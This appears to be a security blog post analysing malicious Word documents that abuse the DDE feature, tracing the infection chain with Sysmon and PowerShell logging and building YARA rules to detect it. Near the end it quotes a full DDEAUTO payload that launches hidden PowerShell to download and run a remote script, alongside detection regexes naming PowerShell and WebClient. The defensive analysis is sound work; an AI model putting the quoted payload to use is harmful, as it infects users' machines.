DDE Exploitation Detection



So DDE vulnerability/feature (open to debate) is hot and it is being used not only by high profile APT actors like FIN7, but also by several other threat actors, like cyber criminals infecting machines with Locky or Hancitor etc.

Lets see how can we detect the malicious files as well as the typical infection process using DDE feature.

So here is a word doc file which seemingly looks empty but there are two hidden objects.
Md5: f5564925dd68e23672d898e0a590340e

The first thing I will come across is this message, which I should say “No” to.



So I go ahead and click on “No” and I see a word file without any text

The trick is to try Ctrl+A to select everything in the word file and I can seem two invisible boxes selected.


The first box is nothing, maybe a decoy. The second small box is the “Field” element, which contains the Formula to be updated. What is that formula, let us have a look at it:

I select it, right click and say “Toggle Field Codes”..and Ta-da! I can see some code, which could have ben executed if I would have said “Yes” initially.


A simple command to run PowerShell, to download a malicious PS script and execute it.

Let us have a quick look at this script:


I copy the above to a notepad and as expected this is a base64 encoded text, which decodes to a powershell script


The script looks like this:


Download Domains:



MD5: a633ccbf2a9d299a06512319a0286777

Seems like different analysis engines are identifying this sample as either Emotet, Locky or NeutrinoPoS


History

Creation Time
2017-10-19 10:38:56
First Submission
2017-10-19 19:27:46
Last Submission
2017-10-21 01:24:10
Last Analysis
2017-10-21 01:24:10


From hybrid-analysis. Seems like it is an injector, and spawns and injects into msiexec.exe



So we know how the initial infection stages occur. Let us open the malicious word file and follow along to create logs and see what can we find using sysmon and enhanced PS logging:




The malicious file dropped in temp "12.exe"




Winword.exe spawning cmd.exe with parameters for cmd.exe:


cmd.exe spawning powershell.exe




Network communication to download the next powershell script string:



Next we can see the powershell spawning powershell.exe with the -e (execute) the base64 decoded PS script:


Powershell.exe creating an exe in the appdata/local/temp folder:




powershell.exe spawning the 12.exe (executable) from appdata/local/temp folder:



Enhanced PS Logging is also showing us the deobfuscated PS executing:





Detecting using YARA rules

Some great references:



For DOCX files, since it is a compressed file, I had to decompress it and navigate inside “word” folder and then run grep to identify the strings inside the files. I looked for string “DDE”, “powershell”, “webclient”
cat document.xml | xxd | grep -i -v "hidden\|dden\|hidde" | grep -i "DDE\|powershell\|webclient" -B5 -A5

Found this in the document.xml file:


Let us create a yara rule

rule dde_docx
{
        strings:
           $s1 = /[Dd][Dd][Ee].+?[cC][mM][Dd].+?[Pp][Oo][wW][Ee][Rr]/

        condition:
           $s1
}
rule ddeauto_docx
{
        strings:
           $s1 = /[Dd][Dd][Ee][Aa][Uu][Tt][Oo].+?[cC][mM][Dd].+?[Pp][Oo][wW][Ee][Rr]/

        condition:
           $s1
}



But this works on the uncompressed document.xml within the actual docx file. So let us use the tool zipdump.py (courtesy of Didier Stevens) along with yara to detect within a compressed file:



Throwing the yarastringsraw on the std output


I tried testing on various malicious samples deploying DDE technique using this yara rule:


Out of 13 samples, 3 went undetected.


When I tried by regex on the contents of the document.xml file

The sample 0cfab9a3365f4aabaabca4f31206d1c2d8cf82608c46af9b39d37a0936923987.bin is missing cmd.exe, instead it is trying to try directory traversal to execute powershell directly.


The field object is hiding behind this image and is font size 1 and invisible so was tricky to detect:





When I click yes for DDE command to execute to see if this really works. And it does!


The other sample looked like this:


The following was hiding behind the Mcafee secure image

DDEAUTO"C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('https://netdocuments(dot)jacksonkelly.co/pl.ps1'); powershell -e $e # " "issued by Jackson Kelly PLLC"  \* MERGEFORMAT


So I modified my yara rule as following and was able to detect these as well

faisal@siftworkstation:~$ cat dde_docx.yara
rule dde_docx
{
        strings:
           $s1 = /[Dd][Dd][Ee].+?[cC][mM][Dd].+?[Pp][Oo][wW][Ee][Rr]/

        condition:
           $s1
}
rule ddeauto_docx
{
        strings:
           $s2 = /[Dd][Dd][Ee][Aa][Uu][Tt][Oo].+?[cC][mM][Dd].+?[Pp][Oo][wW][Ee][Rr]/

        condition:
           $s2
}

rule ddeauto_msword
{
        strings:
           $s3 = /[Dd][Dd][Ee][Aa][Uu][Tt][Oo].+?[Mm][Ss][Ww][oO][Rr][Dd][.][Ee][Xx][Ee]/

        condition:
           $s3
}

rule dde_msword
{
        strings:
           $s4 = /[Dd][Dd][Ee].+?[Mm][Ss][Ww][oO][Rr][Dd][.][Ee][Xx][Ee]/

        condition:
           $s4
}


Comments